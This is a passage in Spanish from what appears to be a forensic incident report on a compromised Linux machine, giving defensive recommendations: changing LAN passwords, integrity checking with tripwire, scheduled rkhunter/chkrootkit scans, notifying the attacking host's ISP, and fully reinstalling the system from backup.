una buena política cambiar las contraseñas de las maquinas de la misma LAN.
• Sería muy recomendable instalar un sistema de verificación de integridad, tipo tripwire, que
verifique si ha habido alteraciones en los ficheros importantes del sistema.
• Visto el impacto que han tenido los virus en esta intrusión, no estaría de más introducir en
la rutina de comprobaciones el pasar un antivirus para Linux de vez en cuando. De igual
manera, también se puede programar en el crontab que el rkhunter o el chkrootkit corran
de vez en cuando y nos notifiquen si detectan algo.
• Para limitar en la medida de lo posible la actuación de los atacantes, deberíamos notificar
lo antes posible a los administradores de la maquina en el ISP Altaway Technologies,
Reno, Nevada, EEUU desde la que nos atacaron, puesto que con toda seguridad debe
estar comprometida. Así, el administrador de dicho servidor, recobrará el control sobre su
equipo y el intruso habrá perdido una maquina bajo su control.
• No recomendamos limpiar la maquina sino su total reinstalación previo formateo, puesto
que podría quedar algo que se nos haya pasado por alto que facilitara a los atacantes el
acceso de nuevo. La maquina no parecía tener datos de interés, pero siempre es
conveniente tener un backup reciente de los datos personales. En caso de que las
anteriores medidas no hayan sido suficientes, reinstalaremos el S.O. y restauraremos del
backup los datos.
43